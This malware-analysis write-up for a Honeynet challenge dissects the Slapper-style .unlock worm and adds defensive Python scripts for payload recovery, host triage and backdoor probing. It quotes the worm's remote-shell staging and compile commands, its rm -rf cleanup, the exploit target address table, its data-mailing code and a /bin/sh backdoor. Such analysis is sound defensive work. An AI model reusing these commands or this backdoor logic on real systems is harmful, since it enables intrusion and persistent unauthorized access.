Asby and N|ghtHawk of Mostly Harmless



The Challenge:

Members from the Honeynet.BR team have captured a new worm from the wild. The file (.unlock)
was used by the worm to infect the honeypot. Your mission is to analyze the captured file in
order to answer the questions below. Be sure you review the submission rules at the SotM
challenge page before submitting your results.

Questions

1.  Which is the type of the .unlock file? When was it generated?
2.  Based on the source code, who is the author of this worm? When was it created? Is it compatible with the date from question 1?
3.  Which process name is used by the worm when it is running?
4.  In which format does the worm copy itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, which files remain on the infected machine?
5.  Which port is scanned by the worm?
6.  Which vulnerability does the worm try to exploit? On which architectures?
7.  What kind of information is sent by the worm by email? To which account?
8.  Which port (and protocol) is used by the worm to communicate with other infected machines?
9.  Name 3 functionalities built into the worm to attack other networks.
10. What is the purpose of the .update.c program? Which port does it use?
Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?



Question 1: Which is the type of the .unlock file? When was it generated?

A. Which is the type of the .unlock file? 
  - gzip compressed data

	[email protected]:~/scan$ file .unlock
	.unlock: gzip compressed data, deflated, last modified: Fri Sep 20 12:59:04 2002, os: Unix

B. When was it generated?
  - Fri Sep 20 12:59:04 2002, according to the gzip header. This is the MTIME field of the gzip
    header (UTC epoch seconds, which `file` renders in the local timezone of the analysis host),
    i.e. the modification time of the tar file at the moment it was compressed, not the time
    the worm was written.

	[email protected]:~/scan$ file .unlock
	.unlock: gzip compressed data, deflated, last modified: Fri Sep 20 12:59:04 2002, os: Unix
Question 2: Based on the source code, who is the author of this worm? When was it created? Is it compatible with the date from question 1?

A. Based on the source code, who is the author of this worm? 
  - contem ([email protected])
  - modified by aion ([email protected])

	[email protected]:~/scan$ head -4 .unlock.c |tail -2
	 *           Peer-to-peer UDP Distributed Denial of Service (PUD)           *
	 *                         by [email protected]                                  *
	[email protected]:~/scan$ head -38 .unlock.c |tail -1
	 *  some modification done by aion ([email protected])                           *

B. When was it created?
  - Sep 20 15:28 is the mtime stored in the archive for .unlock.c (tar restores member mtimes on
    extraction, so this is what ls shows after tar xzf).

	[email protected]:~/scan$ ls -la |grep .unlock.c
	-rw-r--r--    1 hawkeye  hawkeye     70981 Sep 20 15:28 .unlock.c

C. Is it compatible with the date from question 1?
  - No. The .unlock.c inside the archive is about two and a half hours newer than the archive that
    contains it, which cannot happen when both values come from the same correctly set clock: the
    12:59:04 value is the gzip header MTIME written when .unlock was compressed, the 15:28 value is
    the member mtime stored in the tar. Both are rendered here in the same local timezone, so the
    display is not the cause; the clocks of the systems that produced the two stamps evidently did
    not agree, and neither value should be trusted as the worm's creation time.
	.unlock: Fri Sep 20 12:59:04 2002
	.unlock.c: Sep 20 15:28
Question 3: Which process name is used by the worm when it is running?

  - "httpd " (with a trailing space; the worm sets this as its process name so that it looks like an
    Apache httpd worker in a ps listing, and the trailing space is the tell that separates it from the
    real thing)

	[email protected]:~/scan$ head -78 .unlock.c |tail -1
	#define PSNAME          "httpd "
Question 4: In which format does the worm copy itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, which files remain on the infected machine?

A. In which format does the worm copy itself to the new infected machine?

  - As a uuencoded copy of the gzipped tar archive (.unlock itself), typed into the exploited shell
    as a here-document and turned back into the archive with uudecode on the victim:

	[email protected]:~/scan$ head -1416 .unlock.c |tail -1
	  writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
	[email protected]:~/scan$ head -1421 .unlock.c|tail -1
	  writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "



B. Which files are created in the whole process?
  - /tmp/.unlock.uu   (uuencoded payload written through the here-document)
  - /tmp/.unlock      (the gzipped tar, output of uudecode)
  - /tmp/.unlock.c    (extracted from the tar)
  - /tmp/.update.c    (extracted from the tar)
  - /tmp/httpd        (the worm, compiled on the victim against libcrypto)
  - /tmp/update       (the backdoor, compiled on the victim)

	[email protected]:~/scan$ head -1424 .unlock.c |tail -4
	  writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "
	                "tar xzf /tmp/.unlock -C /tmp/;              "
	                "gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; "
	                "gcc -o /tmp/update /tmp/.update.c;\n");


C. After the worm executes itself, which files remain on the infected machine?
  - /tmp/.unlock (the only staging file that is not in the rm -rf list)

	[email protected]:~/scan$ head -1428 .unlock.c |tail -4
	  sprintf(rcv,  "/tmp/httpd %s; /tmp/update; \n",localip);
	  writem(sockfd,rcv); sleep(3);
	  writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
	                "       /tmp/httpd /tmp/update; exit; \n");

  Note that /tmp/httpd and /tmp/update are started first and deleted three seconds later, so on a
  live victim the worm and the backdoor keep running from unlinked binaries: they are missing from
  a directory listing, but /proc/<pid>/exe still points at "/tmp/httpd (deleted)" and the binary can
  be copied out from there before the process exits. Also, because the worm is compiled on the
  victim, the infection only succeeds on hosts that have gcc and the OpenSSL development headers
  installed.
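The staging sequence above and the date check from question 2, as an added example (Python) that is not part of this write-up or the worm's code: it builds a constructed archive carrying the two timestamps from questions 1 and 2, wraps it in a session transcript using the worm's own command strings, carves and uudecodes the payload back out the way a responder would from a captured session, and then reads the gzip header MTIME and the tar member mtimes directly instead of trusting what `file` and `ls` print. The archive contents, the timestamps and the transcript are constructed; the function names are mine.

```python
"""Recover the worm's payload from a captured session and check the two dates.

Added example for this write-up; it is not code from the worm or from the
Honeynet challenge.  The archive contents, timestamps and session transcript
below are CONSTRUCTED so the script runs offline; only the shell command
strings mirror the ones quoted from .unlock.c above.
"""
import binascii
import calendar
import gzip
import io
import struct
import tarfile

# Constructed timestamps, UTC epoch seconds: the archive header says 12:59:04,
# the .unlock.c stored inside it claims 15:28:00 on the same day.
GZIP_MTIME = calendar.timegm((2002, 9, 20, 12, 59, 4))
SOURCE_MTIME = calendar.timegm((2002, 9, 20, 15, 28, 0))


def build_archive(c_source, src_mtime=SOURCE_MTIME, gz_mtime=GZIP_MTIME):
    """Make a gzipped tar like .unlock: two members with a chosen mtime,
    then gzip it with a chosen header MTIME."""
    tar_buf = io.BytesIO()
    with tarfile.open(fileobj=tar_buf, mode="w", format=tarfile.USTAR_FORMAT) as tar:
        for name, data in ((".unlock.c", c_source), (".update.c", b"/* constructed stub */\n")):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mtime = src_mtime
            tar.addfile(info, io.BytesIO(data))
    gz_buf = io.BytesIO()
    with gzip.GzipFile(fileobj=gz_buf, mode="wb", mtime=gz_mtime) as gz:
        gz.write(tar_buf.getvalue())
    return gz_buf.getvalue()


def uuencode(blob, name=".unlock"):
    """uuencode(1) layout: 45 raw bytes per line, terminated by "`" and "end"."""
    lines = ["begin 644 " + name]
    for i in range(0, len(blob), 45):
        lines.append(binascii.b2a_uu(blob[i:i + 45]).decode("ascii").rstrip("\n"))
    lines += ["`", "end"]
    return "\n".join(lines) + "\n"


def build_transcript(uu_text):
    """What the infector types into the exploited shell (commands as quoted above)."""
    return ("cat > /tmp/.unlock.uu << __eof__; \n" + uu_text + "__eof__\n"
            "uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "
            "tar xzf /tmp/.unlock -C /tmp/;              "
            "gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; "
            "gcc -o /tmp/update /tmp/.update.c;\n")


def carve_payload(transcript):
    """Pull the here-document out of the transcript and uudecode it, which is
    what `uudecode -o /tmp/.unlock /tmp/.unlock.uu` does on the victim."""
    lines = transcript.splitlines()
    start = next(i for i, line in enumerate(lines) if "<< __eof__" in line)
    stop = next(i for i in range(start + 1, len(lines)) if lines[i].strip() == "__eof__")
    body = lines[start + 1:stop]
    if not body or not body[0].startswith("begin "):
        raise ValueError("no uuencoded block in here-document")
    out = bytearray()
    for line in body[1:]:
        if line.strip() in ("`", "end", ""):   # terminator lines carry no data
            break
        out += binascii.a2b_uu(line)
    return bytes(out)


def gzip_header_mtime(blob):
    """MTIME field of the gzip header (bytes 4..7, little-endian, UTC epoch).
    This is the 'last modified' value that `file` prints."""
    if blob[:2] != b"\x1f\x8b" or blob[2] != 8:
        raise ValueError("not a deflate gzip stream")
    return struct.unpack("<I", blob[4:8])[0]


def tar_member_mtimes(blob):
    """mtime stored for each member; tar xzf restores these, so this is what
    `ls -la` shows for /tmp/.unlock.c after extraction."""
    with tarfile.open(fileobj=io.BytesIO(gzip.decompress(blob)), mode="r:") as tar:
        return {m.name: int(m.mtime) for m in tar.getmembers()}


def check_dates(blob):
    """Compare the archive's own header time with its newest member: a member
    newer than the archive that holds it is inconsistent (question 2C)."""
    header = gzip_header_mtime(blob)
    members = tar_member_mtimes(blob)
    newest = max(members.values())
    return {"gzip_mtime": header, "members": members,
            "consistent": newest <= header, "gap_seconds": newest - header}


def run_demo():
    original = build_archive(b"/* constructed stand-in for .unlock.c */\n")
    recovered = carve_payload(build_transcript(uuencode(original)))
    result = check_dates(recovered)
    result["roundtrip_ok"] = recovered == original
    return result


if __name__ == "__main__":
    import time
    r = run_demo()
    fmt = lambda t: time.strftime("%a %b %d %H:%M:%S %Y UTC", time.gmtime(t))
    print("payload recovered intact:", r["roundtrip_ok"])
    print("gzip header MTIME:", fmt(r["gzip_mtime"]))
    for name, t in r["members"].items():
        print(f"member {name:<10} mtime:", fmt(t))
    print("consistent:", r["consistent"], " gap:", r["gap_seconds"], "s")
```

Comparing the two values as epoch seconds sidesteps the timezone question entirely: both `file` and `ls` only differ from this in how they render the number.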
Question 5: Which port is scanned by the worm?

  - 80

	[email protected]:~/scan$ head -67 .unlock.c |tail -1
	#define SCANPORT        80
Question 6: Which vulnerability does the worm try to exploit? On which architectures?

A. Which vulnerability does the worm try to exploit?
  - The buffer overflow in OpenSSL's SSLv2 handshake (CVE-2002-0656), reached through Apache's
    mod_ssl. The worm links against OpenSSL so that it can speak the SSL handshake itself, and
    its target table is keyed on Apache version:

	[email protected]:~/scan$ head -1141 .unlock.c |tail -4
	#include <openssl/ssl.h>
	#include <openssl/rsa.h>
	#include <openssl/x509.h>
	#include <openssl/evp.h>

B. On which architectures?
  - The "architectures" table is really a list of Linux distribution / Apache version pairs, each
    with the address the exploit uses for that particular build. The 0x08xxxxxx values lie in the
    address space of a 32-bit x86 ELF executable (text base 0x08048000), so every target is Linux on
    i386; the distributions and Apache versions are:
  - Gentoo (no version string)
  - Debian (1.3.26)
  - Red-Hat (1.3.6, 1.3.9, 1.3.12, 1.3.19, 1.3.20, 1.3.22, 1.3.23, 1.3.26)
  - SuSE (1.3.12, 1.3.17, 1.3.19, 1.3.20, 1.3.23)
  - Mandrake (1.3.14, 1.3.19, 1.3.20, 1.3.23)
  - Slackware (1.3.26)
  - Red-Hat 1.3.12, SuSE 1.3.23 and Slackware 1.3.26 appear twice with different addresses, i.e.
    two builds of the same Apache release are handled.

	[email protected]:~/scan$ head -1269 .unlock.c |tail -25
	} architectures[] = {
	        {"Gentoo", "", 0x08086c34},
        	{"Debian", "1.3.26", 0x080863cc},
	        {"Red-Hat", "1.3.6", 0x080707ec},
        	{"Red-Hat", "1.3.9", 0x0808ccc4},
	        {"Red-Hat", "1.3.12", 0x0808f614},
        	{"Red-Hat", "1.3.12", 0x0809251c},
	        {"Red-Hat", "1.3.19", 0x0809af8c},
        	{"Red-Hat", "1.3.20", 0x080994d4},
	        {"Red-Hat", "1.3.26", 0x08161c14},
        	{"Red-Hat", "1.3.23", 0x0808528c},
	        {"Red-Hat", "1.3.22", 0x0808400c},
        	{"SuSE", "1.3.12", 0x0809f54c},
	        {"SuSE", "1.3.17", 0x08099984},
        	{"SuSE", "1.3.19", 0x08099ec8},
	        {"SuSE", "1.3.20", 0x08099da8},
        	{"SuSE", "1.3.23", 0x08086168},
	        {"SuSE", "1.3.23", 0x080861c8},
        	{"Mandrake", "1.3.14", 0x0809d6c4},
	        {"Mandrake", "1.3.19", 0x0809ea98},
	        {"Mandrake", "1.3.20", 0x0809e97c},
	        {"Mandrake", "1.3.23", 0x08086580},
	        {"Slackware", "1.3.26", 0x083d37fc},
	        {"Slackware", "1.3.26",0x080b2100}
	};
Question 7: What kind of information is sent by the worm by email? To which account?

A. What kind of information is sent by the worm by email?
  - the host id (gethostid())
  - the hostname
  - att_from: the IP address the infection came from, i.e. the infecting machine's address that
    the new copy is started with ("/tmp/httpd %s" with localip, see question 4)

	[email protected]:~/scan$ head -124 .unlock.c |tail -3
	  sprintf(cmdbuf," hostid:   %d \r\n"
        	         " hostname: %s \r\n"
                	 " att_from: %s \r\n",gethostid(),buffer,sip);

B. To which account? 
  - [email protected]

	[email protected]:~/scan$ head -77 .unlock.c |tail -1
	#define MAILTO          "[email protected]"
Question 8: Which port (and protocol) is used by the worm to communicate to other infected machines?

  - Port : 4156
  - Protocol : UDP

	[email protected]:~/scan$ head -66 .unlock.c |tail -1
	#define PORT            4156
	[email protected]:~/scan$ head -3 .unlock.c |tail -1
	 *           Peer-to-peer UDP Distributed Denial of Service (PUD)           *
Question 9: Name 3 functionalities built in the worm to attack other networks.

  - UDP flood
  - TCP flood (IPv4 and IPv6)
  - DNS flood

	[email protected]:~/scan$ head -2205 .unlock.c |tail -1
	                                        case 0x29: { // Udp flood
	[email protected]:~/scan$ head -2246 .unlock.c |tail -1
        	                                case 0x2A: { // Tcp flood
	[email protected]:~/scan$ head -2279 .unlock.c |tail -1
        	                                case 0x2B: { // IPv6 Tcp flood
	[email protected]:~/scan$ head -2308 .unlock.c |tail -1
        	                                case 0x2C: { // Dns flood
Question 10: What is the purpose of the .update.c program? Which port does it use?

A. What is the purpose of the .update.c program?
  - It is a password-gated backdoor. It listens on a TCP port, reads what the client sends and, if
    the data starts with the compiled-in PASS string, exec()s /bin/sh on that connection; otherwise
    it closes its descriptors and exits. Because execl() replaces the whole process image with the
    shell, nothing of the backdoor survives a successful login except the shell itself, so its role
    is to let the attacker back onto the machine, for example to install another backdoor. Note that
    the execl() call passes "sh -i" as argv[0] rather than as an option, so the -i never reaches the
    shell; it still reads commands from the socket because that is its stdin.

	[email protected]:~/scan$ head -66 .update.c|tail -4
        	        if( !strncmp(temp_buff,PASS,strlen(PASS)) )
                	  execl("/bin/sh","sh -i",(char *)0);
                	closeall();
                	exit(0);


B. Which port does it use?
  - 1052

	[email protected]:~/scan$ head -4 .update.c|tail -1
	#define PORT      1052
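For a responder who has to decide whether a host is infected, the indicators quoted in questions 3, 4, 8 and 10 can be checked against /proc in one place. The following is an added example (Python), not code from the challenge or the worm. triage() is pure and is run here on constructed /proc-style records; live_triage() feeds it the real /proc of a Linux host. The "(deleted)" suffix on /proc/<pid>/exe and the hexadecimal port column of /proc/net/tcp and /proc/net/udp are standard Linux procfs behaviour; the indicator values are the ones quoted above, and the function names are mine.

```python
"""Host triage for the indicators the answers above pull out of .unlock.c and
.update.c.  Added example for this write-up, not code from the challenge or
the worm.  triage() is pure and is exercised on CONSTRUCTED /proc-style
records; live_triage() feeds it the real /proc of a Linux host.
"""
import os

WORM_PSNAME = "httpd "            # #define PSNAME "httpd " (trailing space)
P2P_UDP_PORT = 4156               # #define PORT 4156 in .unlock.c
BACKDOOR_TCP_PORT = 1052          # #define PORT 1052 in .update.c
STAGING_FILES = ("/tmp/.unlock", "/tmp/.unlock.uu", "/tmp/.unlock.c",
                 "/tmp/.update.c", "/tmp/httpd", "/tmp/update")
TCP_LISTEN = "0A"                 # 'st' column value of a listening TCP socket


def parse_proc_net(text):
    """(local_port, state) for each row of /proc/net/tcp or /proc/net/udp.
    local_address is hex, so "00000000:103C" is 0.0.0.0:4156."""
    rows = []
    for line in text.splitlines()[1:]:          # first line is the column header
        cols = line.split()
        if len(cols) < 4:
            continue
        rows.append((int(cols[1].rsplit(":", 1)[1], 16), cols[3]))
    return rows


def triage(processes, proc_net_udp, proc_net_tcp, present_files):
    """processes: iterable of (pid, argv0, exe_link_target).  Returns the list
    of matched indicators; an empty list means nothing here matched."""
    findings = []
    for pid, argv0, exe in processes:
        if argv0 == WORM_PSNAME:
            findings.append(f"pid {pid}: argv[0] is {argv0!r}, the worm's PSNAME")
        if exe.startswith("/tmp/") and exe.endswith(" (deleted)"):
            findings.append(f"pid {pid}: runs from unlinked binary {exe}")
    for port, _state in parse_proc_net(proc_net_udp):
        if port == P2P_UDP_PORT:
            findings.append(f"udp/{port} bound: worm peer-to-peer port")
    for port, state in parse_proc_net(proc_net_tcp):
        if port == BACKDOOR_TCP_PORT and state == TCP_LISTEN:
            findings.append(f"tcp/{port} listening: .update.c backdoor window is open")
    for path in present_files:
        if path in STAGING_FILES:
            findings.append(f"staging file present: {path}")
    return findings


def live_processes():
    """Yield (pid, argv0, exe) from /proc: argv[0] is what a renamed worm shows
    in ps, exe is the real (possibly already deleted) binary."""
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0", 1)[0].decode(errors="replace")
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue                             # exited, or not ours to read
        yield int(pid), argv0, exe


def live_triage():
    with open("/proc/net/udp") as f:
        udp = f.read()
    with open("/proc/net/tcp") as f:
        tcp = f.read()
    return triage(live_processes(), udp, tcp,
                  [p for p in STAGING_FILES if os.path.lexists(p)])


# CONSTRUCTED records standing in for a freshly infected host.
SAMPLE_PROCESSES = [
    (1234, "httpd ", "/tmp/httpd (deleted)"),      # the worm, binary already rm'd
    (1235, "/tmp/update", "/tmp/update (deleted)"),
    (812, "/usr/sbin/httpd", "/usr/sbin/httpd"),   # the real Apache
]
SAMPLE_UDP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:103C 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 12345 2 0000000000000000 0
   1: 00000000:0044 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 12346 2 0000000000000000 0
"""
SAMPLE_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:041C 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12347 1 0000000000000000 100 0 0 10 0
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12348 1 0000000000000000 100 0 0 10 0
"""
SAMPLE_FILES = ["/tmp/.unlock"]


def run_demo():
    return triage(SAMPLE_PROCESSES, SAMPLE_UDP, SAMPLE_TCP, SAMPLE_FILES)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

The process check deliberately looks at /proc/<pid>/cmdline rather than the file name, because the worm's binary is gone three seconds after it starts (question 4C); the socket check is the only one that depends on timing, since the 1052 listener exists for ten seconds at a time (bonus question).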


Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?

  - SLEEPTIME makes the program sleep for 5 minutes (300 seconds) with no socket open, and UPTIME
    makes it listen on the port for only 10 seconds before going back to sleep. The backdoor is
    therefore reachable for 10 seconds out of every 310 (about 3% of the time), so a single
    connection attempt or port scan will almost always find 1052 closed, and the listener is
    unlikely to show up in a casual netstat either.

	[email protected]:~/scan$ head -7 .update.c|tail -2
	#define SLEEPTIME 300          // sleep  5 min.
	#define UPTIME    10           // listen 10 sec.
	[email protected]:~/scan$ head -52 .update.c|tail -1
        	for(stimer=time(NULL);(stimer+UPTIME)>time(NULL);)
	[email protected]:~/scan$ head -73 .update.c|tail -1
        	sleep(SLEEPTIME);
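How much that duty cycle hides the backdoor, and how to probe for it anyway, as an added example (Python) that is not part of this write-up or the worm: detection_fraction() enumerates every possible phase of the 310-second cycle and counts how many of them a given probe schedule catches, and probe_for_window() is the corresponding live check. SLEEPTIME and UPTIME are the values quoted above; the only assumption about the backdoor is the one the quoted source supports, that it accepts a TCP connection during its UPTIME window. The function names are mine.

```python
"""Why one port scan nearly always sees 1052 closed, and how to probe for it.

Added example for this write-up, not code from the challenge or the worm.
SLEEPTIME and UPTIME are the values quoted from .update.c; the only assumption
about the backdoor is that it accepts TCP connections during its UPTIME window.
"""
from fractions import Fraction
import socket
import time

SLEEPTIME = 300                   # sleep 5 min with no socket open
UPTIME = 10                       # listen 10 s
PERIOD = SLEEPTIME + UPTIME       # one full cycle, 310 s


def detection_fraction(interval, duration, sleeptime=SLEEPTIME, uptime=UPTIME):
    """Fraction of cycle phases (1 s granularity) in which at least one probe,
    sent every `interval` s for `duration` s, lands inside the listen window.
    The scanner does not know the phase, so every phase is equally likely."""
    period = sleeptime + uptime
    probe_times = range(0, duration + 1, interval)
    hits = sum(1 for phase in range(period)
               if any((phase + t) % period < uptime for t in probe_times))
    return Fraction(hits, period)


def probe_once(host, port, timeout=1.0):
    """True if a TCP connect completes; False on refusal or timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def probe_for_window(host, port=1052, interval=UPTIME // 2, duration=PERIOD):
    """Probe every `interval` s for `duration` s.  interval <= UPTIME means some
    probe must fall inside the window whatever the phase, and duration >= PERIOD
    means a whole cycle is covered.  Returns seconds until the first successful
    connect, or None if the port never answered."""
    start = time.monotonic()
    while True:
        elapsed = time.monotonic() - start
        if probe_once(host, port):
            return round(elapsed)
        if elapsed + interval > duration:
            return None
        time.sleep(interval)


if __name__ == "__main__":
    print("single probe         :", detection_fraction(1, 0))        # 1/31
    print("every 60 s for 310 s :", detection_fraction(60, PERIOD))  # 6/31
    print("every 10 s for 310 s :", detection_fraction(10, PERIOD))  # 1
```

A single probe has a 1 in 31 chance; probing every UPTIME seconds for one full period is guaranteed to catch the window. A connect probe does reach the backdoor's accept()/read() path, so on a live incident the /proc evidence (the listening socket, the deleted binaries) is the less intrusive source and should be preferred where it is available.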

Conclusion

The .unlock file seems to be the Linux.Worm.Slapper.C.


Asby and N|ghtHawk
Mostly Harmless